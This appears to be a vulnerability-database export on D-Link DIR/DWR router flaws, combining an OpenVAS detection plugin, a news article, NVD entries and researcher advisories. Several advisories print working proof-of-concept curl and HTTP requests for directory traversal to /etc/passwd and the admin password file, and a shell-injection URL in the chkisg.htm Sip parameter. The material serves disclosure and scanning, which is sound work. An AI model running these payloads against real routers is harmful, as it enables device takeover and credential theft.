{"id": "OPENVAS:1361412562310108487", "type": "openvas", "bulletinFamily": "scanner", "title": "D-Link DIR/DWR Devices Multiple Vulnerabilities - Oct18", "description": "The host is a D-Link (DIR/DWR) device which is\n prone to multiple vulnerabilities.", "published": "2018-11-26T00:00:00", "modified": "2020-05-08T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108487", "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "references": ["https://seclists.org/fulldisclosure/2018/Oct/36", "http://sploit.tech/2018/10/12/D-Link.html", "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10093"], "cvelist": ["CVE-2018-10823", "CVE-2018-10824", "CVE-2017-6190", "CVE-2018-10822"], "lastseen": "2020-05-12T16:30:43", "viewCount": 17, "enchantments": {"dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:9C79643921703C4490513BB2D496FCA3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142052", "PACKETSTORM:149844"]}, {"type": "cve", "idList": ["CVE-2018-10822", "CVE-2018-10823", "CVE-2018-10824", "CVE-2017-6190"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:487819B5F7D2057B581292BB94033613", "EXPLOITPACK:99C55C552E76F7F5F22B613B84A71628", "EXPLOITPACK:74666E227460F5E33300C7E86CA29F21", "EXPLOITPACK:8AB3A02A28DDB5D882D234C411704FB7"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108486"]}, {"type": "exploitdb", "idList": ["EDB-ID:41840", "EDB-ID:45677", "EDB-ID:45678", "EDB-ID:45676"]}, {"type": "zdt", "idList": ["1337DAY-ID-31400", "1337DAY-ID-31401", "1337DAY-ID-31402"]}], "modified": "2020-05-12T16:30:43", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2020-05-12T16:30:43", "rev": 2}, "vulnersScore": 7.2}, "pluginID": "1361412562310108487", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# D-Link DIR/DWR Devices Multiple Vulnerabilities - Oct18\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE_PREFIX = \"cpe:/o:d-link\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108487\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2018-10822\", \"CVE-2018-10823\", \"CVE-2018-10824\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-11-26 13:53:11 +0100 (Mon, 26 Nov 2018)\");\n\n script_name(\"D-Link DIR/DWR Devices Multiple Vulnerabilities - Oct18\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_dlink_dsl_detect.nasl\", \"gb_dlink_dap_detect.nasl\", \"gb_dlink_dir_detect.nasl\", \"gb_dlink_dwr_detect.nasl\");\n script_mandatory_keys(\"Host/is_dlink_device\"); # nb: Experiences in the past have shown that various different devices might be affected\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10093\");\n script_xref(name:\"URL\", value:\"http://sploit.tech/2018/10/12/D-Link.html\");\n script_xref(name:\"URL\", value:\"https://seclists.org/fulldisclosure/2018/Oct/36\");\n\n script_tag(name:\"summary\", value:\"The host is a D-Link (DIR/DWR) device which is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP GET request\n and check whether it is possible to read a file on the filesystem.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to:\n\n - a directory traversal vulnerability in the web interface (CVE-2018-10822) caused by an incorrect\n fix for CVE-2017-6190.\n\n - the administrative password stored in plaintext in the /tmp/XXX/0 file (CVE-2018-10824).\n\n - the possibility to injection code shell commands as an authenticated user into the Sip parameter\n of the chkisg.htm page (CVE-2018-10823).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to read arbitrary files on the target system, extract plain text\n passwords or execute remote commands.\");\n\n script_tag(name:\"affected\", value:\"DWR-116 through 1.06,\n\n DIR-140L and DIR-640L through 1.02,\n\n DWR-512, DWR-712, DWR-912 and DWR-921 through 2.02,\n\n DWR-111 through 1.01.\n\n Other devices, models or versions might be also affected.\");\n\n script_tag(name:\"solution\", value:\"See the vendor advisory for a solution.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! infos = get_app_port_from_cpe_prefix( cpe:CPE_PREFIX, service:\"www\" ) )\n exit( 0 );\n\nport = infos[\"port\"];\nCPE = infos[\"cpe\"];\n\nfiles = traversal_files( \"linux\" );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" )\n dir = \"\";\n\nforeach pattern( keys( files ) ) {\n\n file = files[pattern];\n url = dir + \"/uir//\" + file;\n\n if( http_vuln_check( port:port, url:url, pattern:pattern, check_header:TRUE ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "naslFamily": "Web application abuses", "immutableFields": []}

{"threatpost": [{"lastseen": "2019-10-12T19:32:12", "bulletinFamily": "info", "cvelist": ["CVE-2017-6190", "CVE-2018-10822", "CVE-2018-10823", "CVE-2018-10824"], "description": "Eight D-Link routers in the company\u2019s small/home office \u201cDWR\u201d range are vulnerable to complete takeover \u2013 but the vendor said it is planning on only patching two, according to a researcher.\n\nB\u0142a\u017cej Adamczyk of the Silesian University of Technology in Poland discovered the vulnerabilities in May, uncovering that they affect the DWR-111, DWR-116, DWR-140, DWR-512, DWR-640, DWR-712, DWR-912 and DWR-921 models. However, he claims that D-Link told him that only the DWR-116 and 111 would be patched, because the rest have reached end-of-life and will no longer be supported.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/10/17112931/D-Link-DWR-1111.jpg>)\n\nHowever, D-Link hasn\u2019t issued the two promised patches, so after warning the vendor in September that he would publicly disclose the flaws if they weren\u2019t addressed within a month, Adamczyk has published his findings, along with a [proof-of-concept video](<https://www.youtube.com/watch?v=s2xrQlfd7BY&feature=youtu.be>).\n\nA full compromise including remote command-injection can be achieved by linking three cascading vulnerabilities together to attack the router\u2019s web-based settings panel. This can be done from a local network device or from the internet, depending on the configuration of the network. Most small/home office (SOHO) users have a fairly simple set-up, with the routers connecting directly to an internet connection to feed bandwidth to multiple WiFi devices inside the home or office. That presents a pretty straightforward attack surface for an attacker.\n\nFirst, a directory-traversal bug (CVE-2018-10822) exists in the web interface for the D-Link routers, which allows remote attackers to read arbitrary files via a /.. or // after a \u201cGET /uir\u201d in an HTTP request. This allows the bad guys to move laterally and read files in other directories, including password files.\n\nThat\u2019s where a second vulnerability (CVE-2018-10824) comes in: Passwords are stored in plaintext, including the administrative password, which can be found in a temporary file.\n\nIn a proof-of-concept, a basic command returns a binary configuration file which contains administrative username and password in cleartext as well as many other router configuration settings. Thus, by using the directory traversal vulnerability, it is possible to read the file without authentication.\n\n\u201cThe attack is too simple,\u201d Adamczyk said in a recent [posting](<https://seclists.org/fulldisclosure/2018/Oct/36>). \u201cAn attacker having a directory traversal (or local file inclusion) can easily get full router access.\u201d\n\nA third vulnerability (CVE-2018-10823) meanwhile is what opens the door for remote code-injection. This is a shell command-injection bug in the httpd server for several series of D-Link routers.\n\n\u201cAn authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter,\u201d Adamczyk explained. \u201cThis allows for full control over the device internals.\u201d\n\nTo exploit this, an adversary would log into the router using the credentials he or she lifted using the first two vulnerabilities, request a certain URL as laid out in the researcher\u2019s PoC, and then be able to see the passwd file contents in the response.\n\n\u201cTaking all the three together it is easy to gain full router control, including arbitrary code-execution,\u201d Adamczyk said.\n\nAdding insult to injury, the researcher explained that the first vulnerability was actually introduced in a flawed patch for an older vulnerability, CVE-2017-6190. The older flaw also contained the plaintext password issue, CVE-2018-10824 \u2013 but it wasn\u2019t addressed for all releases, according to Adamczyk.\n\nD-Link did not immediately respond to Threatpost\u2019s request for comment, but we\u2019ll update the story if it does.\n\nThe vendor is no stranger to remote code-execution flaws; earlier in October [it patched](<https://threatpost.com/d-link-patches-rce-bugs-in-wireless-access-point-gear/137960/>) four vulnerabilities in the software controller tool used in its enterprise-class wireless network access points that would allow RCE. And, last year [it was uncovered](<https://threatpost.com/popular-d-link-router-riddled-with-vulnerabilities/127907/>) that its D-Link router model 850L wireless AC1200 dual-band gigabit cloud router was riddled with vulnerabilities that could allow a hacker to gain remote access and control of device.\n\nEarlier this month a report came out showing that a staggering 83 percent of home and office routers have vulnerabilities that could be exploited by attackers. Of those vulnerable, over a quarter harbor high-risk and critical vulnerabilities, according to the [American Consumer Institute on router safety.](<http://www.theamericanconsumer.org/wp-content/uploads/2018/09/FINAL-Wi-Fi-Router-Vulnerabilities.pdf>)\n\nThe potential ramifications aren\u2019t just about putting SOHO users themselves at risk, given that in many cases remote users rely on these routers to connect to corporate networks.\n\n\u201cWhile protecting the network will always be a challenge, it becomes even more so with remote employees joining the organization\u2019s ranks,\u201d said Justin Jett, director of audit and compliance for Plixer, via email. \u201cBecause these employees will be connecting to the office from their home router, IT professionals should monitor every conversation coming from these remote employees into the business. Three-quarters of the workforce [works remotely or on a mobile basis, and that] is a large surface area for malware to enter the organization, especially with 83 percent of home routers already giving access to hackers.\u201d\n", "modified": "2018-10-17T15:24:27", "published": "2018-10-17T15:24:27", "id": "THREATPOST:9C79643921703C4490513BB2D496FCA3", "href": "https://threatpost.com/multiple-d-link-routers-open-to-complete-takeover-with-simple-attack/138383/", "type": "threatpost", "title": "Multiple D-Link Routers Open to Complete Takeover with Simple Attack", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-10-18T10:13:12", "description": "", "published": "2018-10-18T00:00:00", "type": "packetstorm", "title": "D-Link Plain-Text Password Storage / Code Execution / Directory Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10823", "CVE-2018-10824", "CVE-2017-6190", "CVE-2018-10822"], "modified": "2018-10-18T00:00:00", "id": "PACKETSTORM:149844", "href": "https://packetstormsecurity.com/files/149844/D-Link-Plain-Text-Password-Storage-Code-Execution-Directory-Traversal.html", "sourceData": "` aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \nMULTIPLE VULNERABILITIES IN D-LINK ROUTERS \n \n \nBlazej Adamczyk (br0x) \nblazej.adamczyk@gmail.com \nhttp://sploit.tech/ \naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \n \n \n12.10.2018 \n \n \n1 Directory Traversal in httpd server in several series of D-Link \nrouters \naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \naa \n \nCVE: CVE-2018-10822 \n \nCVSS v3: 8.6 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N) \n \nDirectory traversal vulnerability in the web interface on D-Link \nrouters: \naC/ DWR-116 through 1.06, \naC/ DIR-140L through 1.02, \naC/ DIR-640L through 1.02, \naC/ DWR-512 through 2.02, \naC/ DWR-712 through 2.02, \naC/ DWR-912 through 2.02, \naC/ DWR-921 through 2.02, \naC/ DWR-111 through 1.01, \naC/ and probably others with the same type of firmware \n \nallows remote attackers to read arbitrary files via a /.. or // after \n\"GET /uir\" in an HTTP request. \n \nNOTE: this vulnerability exists because of an incorrect fix for \nCVE-2017-6190. \n \nPoC: \naaaaa \na $ curl http://routerip/uir//etc/passwd \naaaaa \n \nThe vulnerability can be used retrieve administrative password using \nthe other disclosed vulnerability - CVE-2018-10824 \n \nThis vulnerability was reported previously by Patryk Bogdan in \nCVE-2017-6190 but he reported it is fixed in certain release but \nunfortunately it is still present in even newer releases. The \nvulnerability is also present in other D-Link routers and can be \nexploited not only (as the original author stated) by double dot but \nalso absolutely using double slash. \n \n \n2 Password stored in plaintext in several series of D-Link routers \naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \n \nCVE: CVE-2018-10824 \n \nAn issue was discovered on D-Link routers: \naC/ DWR-116 through 1.06, \naC/ DIR-140L through 1.02, \naC/ DIR-640L through 1.02, \naC/ DWR-512 through 2.02, \naC/ DWR-712 through 2.02, \naC/ DWR-912 through 2.02, \naC/ DWR-921 through 2.02, \naC/ DWR-111 through 1.01, \naC/ and probably others with the same type of firmware. \n \nNOTE: I have changed the filename in description to XXX because the \nvendor leaves some EOL routers unpatched and the attack is too \nsimple. \n \nThe administrative password is stored in plaintext in the /tmp/XXX/0 \nfile. An attacker having a directory traversal (or LFI) can easily \nget \nfull router access. \n \nPoC using the directory traversal vulnerability disclosed at the same \ntime - CVE-2018-10822 \n \naaaaa \na $ curl http://routerip/uir//tmp/XXX/0 \naaaaa \n \nThis command returns a binary config file which contains admin \nusername and password as well as many other router configuration \nsettings. By using the directory traversal vulnerability it is \npossible to read the file without authentication. \n \n \n3 Shell command injection in httpd server of a several series of D-Link \nrouters \naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \naaaaaaaa \n \nCVE: CVE-2018-10823 \n \nCVSS v3: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) \n \nAn issue was discovered on D-Link routers: \naC/ DWR-116 through 1.06, \naC/ DWR-512 through 2.02, \naC/ DWR-712 through 2.02, \naC/ DWR-912 through 2.02, \naC/ DWR-921 through 2.02, \naC/ DWR-111 through 1.01, \naC/ and probably others with the same type of firmware. \n \nAn authenticated attacker may execute arbitrary code by injecting the \nshell command into the chkisg.htm page Sip parameter. This allows for \nfull control over the device internals. \n \nPoC: \n1. Login to the router. \n2. Request the following URL after login: \naaaaa \na $ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20 \n%2Fetc%2Fpasswd \naaaaa \n3. See the passwd file contents in the response. \n \n \n4 Exploiting all together \naaaaaaaaaaaaaaaaaaaaaaaaa \n \nCVSS v3: 10 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \nTaking all the three together it is easy to gain full router control \nincluding arbitrary code execution. \n \nDescription with video: [http://sploit.tech/2018/10/12/D-Link.html] \n \n \n5 Timeline \naaaaaaaaaa \n \naC/ 09.05.2018 - vendor notified \naC/ 06.06.2018 - asked vendor about the status because of long vendor \nresponse \naC/ 22.06.2018 - received a reply that a patch will be released for \nDWR-116 and DWR-111, for the other devices which are EOL an \nannouncement will be released \naC/ 09.09.2018 - still no reply from vendor about the patches or \nannouncement, I have warned the vendor that if I will not get a \nreply in a month I will publish the disclosure \naC/ 12.10.2018 - disclosing the vulnerabilities \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149844/dlink-traversalexec.txt"}, {"lastseen": "2017-04-10T19:24:19", "description": "", "published": "2017-04-07T00:00:00", "type": "packetstorm", "title": "D-Link DWR-116 Directory Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6190"], "modified": "2017-04-07T00:00:00", "id": "PACKETSTORM:142052", "href": "https://packetstormsecurity.com/files/142052/D-Link-DWR-116-Directory-Traversal.html", "sourceData": "`# Title: D-Link DWR-116 Arbitrary File Download \n# Vendor: D-Link (www.dlink.com) \n# Affected model(s): DWR-116 / DWR-116A1 \n# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU) \n# CVE: CVE-2017-6190 \n# Date: 04.07.2016 \n# Author: Patryk Bogdan (@patryk_bogdan) \n \nDescription: \nD-Link DWR-116 with firmware before V1.05b09 suffers from vulnerability \nwhich leads to unathorized file download from device filesystem. \n \n \nPoC: \n \nHTTP Request: \nGET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 \nHost: 192.168.2.1 \nAccept: */* \nAccept-Language: en \nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) \nConnection: close \n \nHTTP Response: \nHTTP/1.0 200 OK \nContent-Type: application/x-none \nCache-Control: max-age=60 \nConnection: close \n \nroot:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash \nnobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin \nftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin \n \n \nFix: \nUpdate device to the new firmware (V1.05b09) \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142052/dlinkdwr116-traversal.txt"}], "cve": [{"lastseen": "2021-02-02T06:52:24", "description": "An issue was discovered on D-Link DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 devices. The administrative password is stored in plaintext in the /tmp/csman/0 file. An attacker having a directory traversal (or LFI) can easily get full router access.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-17T14:29:00", "title": "CVE-2018-10824", "type": "cve", "cwe": ["CWE-22", "CWE-522"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10824"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:d-link:dwr-921_firmware:2.02", "cpe:/o:d-link:dwr-512_firmware:2.02", "cpe:/o:d-link:dwr-111_firmware:1.01", "cpe:/o:d-link:dir-140l_firmware:1.02", "cpe:/o:d-link:dwr-912_firmware:2.02", "cpe:/o:d-link:dwr-116_firmware:1.06", "cpe:/o:d-link:dir-640l_firmware:1.02", "cpe:/o:d-link:dwr-712_firmware:2.02"], "id": "CVE-2018-10824", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10824", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:d-link:dir-640l_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-912_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-111_firmware:1.01:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-921_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-512_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-712_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-116_firmware:1.06:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-140l_firmware:1.02:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:24", "description": "Directory traversal vulnerability in the web interface on D-Link DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 devices allows remote attackers to read arbitrary files via a /.. or // after \"GET /uir\" in an HTTP request. NOTE: this vulnerability exists because of an incorrect fix for CVE-2017-6190.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-10-17T14:29:00", "title": "CVE-2018-10822", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10822"], "modified": "2019-01-23T14:10:00", "cpe": ["cpe:/o:d-link:dwr-921_firmware:2.02", "cpe:/o:d-link:dwr-512_firmware:2.02", "cpe:/o:d-link:dwr-111_firmware:1.01", "cpe:/o:d-link:dir-140l_firmware:1.02", "cpe:/o:d-link:dwr-912_firmware:2.02", "cpe:/o:d-link:dwr-116_firmware:1.06", "cpe:/o:d-link:dir-640l_firmware:1.02", "cpe:/o:d-link:dwr-712_firmware:2.02"], "id": "CVE-2018-10822", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10822", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:d-link:dir-640l_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-912_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-111_firmware:1.01:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-921_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-512_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-712_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-116_firmware:1.06:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-140l_firmware:1.02:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:24", "description": "An issue was discovered on D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 devices. An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-17T14:29:00", "title": "CVE-2018-10823", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10823"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:d-link:dwr-512_firmware:2.02", "cpe:/o:d-link:dwr-111_firmware:1.01", "cpe:/o:d-link:dwr-912_firmware:2.02", "cpe:/o:d-link:dwr-116_firmware:1.06"], "id": "CVE-2018-10823", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10823", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:d-link:dwr-912_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-111_firmware:1.01:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-512_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-116_firmware:1.06:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:48", "description": "Directory traversal vulnerability in the web interface on the D-Link DWR-116 device with firmware before V1.05b09 allows remote attackers to read arbitrary files via a .. (dot dot) in a \"GET /uir/\" request.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-04-10T14:59:00", "title": "CVE-2017-6190", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6190"], "modified": "2017-08-16T01:29:00", "cpe": ["cpe:/o:dlink:dwr-116_firmware:v1.01\\(eu\\)", "cpe:/o:dlink:dwr-116_firmware:v1.05\\(au\\)", "cpe:/o:dlink:dwr-116_firmware:v1.00\\(cp\\)b10"], "id": "CVE-2017-6190", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6190", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:dlink:dwr-116_firmware:v1.05\\(au\\):*:*:*:*:*:*:*", "cpe:2.3:o:dlink:dwr-116_firmware:v1.01\\(eu\\):*:*:*:*:*:*:*", "cpe:2.3:o:dlink:dwr-116_firmware:v1.00\\(cp\\)b10:*:*:*:*:*:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T19:04:11", "description": "\nD-Link Routers - Directory Traversal", "edition": 1, "published": "2018-10-12T00:00:00", "title": "D-Link Routers - Directory Traversal", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10824", "CVE-2017-6190", "CVE-2018-10822"], "modified": "2018-10-12T00:00:00", "id": "EXPLOITPACK:487819B5F7D2057B581292BB94033613", "href": "", "sourceData": "Directory Traversal\nCVE: CVE-2018-10822\n\nCVSS v3: 8.6\nAV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n\nDescription: Directory traversal vulnerability in the web interface on D-Link routers:\n\nDWR-116 through 1.06,\nDIR-140L through 1.02,\nDIR-640L through 1.02,\nDWR-512 through 2.02,\nDWR-712 through 2.02,\nDWR-912 through 2.02,\nDWR-921 through 2.02,\nDWR-111 through 1.01,\nand probably others with the same type of firmware\nallows remote attackers to read arbitrary files via a /.. or // after \u201cGET /uir\u201d in an HTTP request.\n\nNOTE: this vulnerability exists because of an incorrect fix for CVE-2017-6190.\n\nPoC:\n\n`$ curl http://routerip/uir//etc/passwd`\nThe vulnerability can be used retrieve administrative password using the other disclosed vulnerability - CVE-2018-10824.\n\nThis 